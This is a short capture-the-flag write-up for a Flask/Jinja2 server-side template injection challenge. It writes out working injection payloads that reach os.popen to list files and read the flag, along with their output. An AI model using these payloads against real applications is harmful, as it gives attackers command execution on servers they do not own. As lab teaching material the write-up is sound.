Challenge Description

Can you exploit this simple mistake?

Solution

Once the Templated instance has been initiated, we can visit the given <IP>:<PORT> combination to access the challenge.

Visiting http://<IP>:<PORT>/ we get this output:

Site still under construction

Proudly powered by Flask/Jinja2

It’s a Flask app using Jinja as a template engine.

Flask/Jinja2 SSTI

We check to see if the app is vulnerable to SSTI:

http://<IP>:<PORT>/{{7*7}}:

Error 404

The page '49' could not be found

It is.

Now we can traverse up the request library in Flask to import the os library to have shell access:

http://<IP>:<PORT>/{{request.application.__globals__.__builtins__.__import__('os').popen('ls').read()}}

Error 404

The page 'bin boot dev etc flag.txt home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var ' could not be found

We found the flag location. Now we can simply cat it out:

http://<IP>:<PORT>/{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}

Error 404

The page 'HTB{t3m***********************************nk!} ' could not be found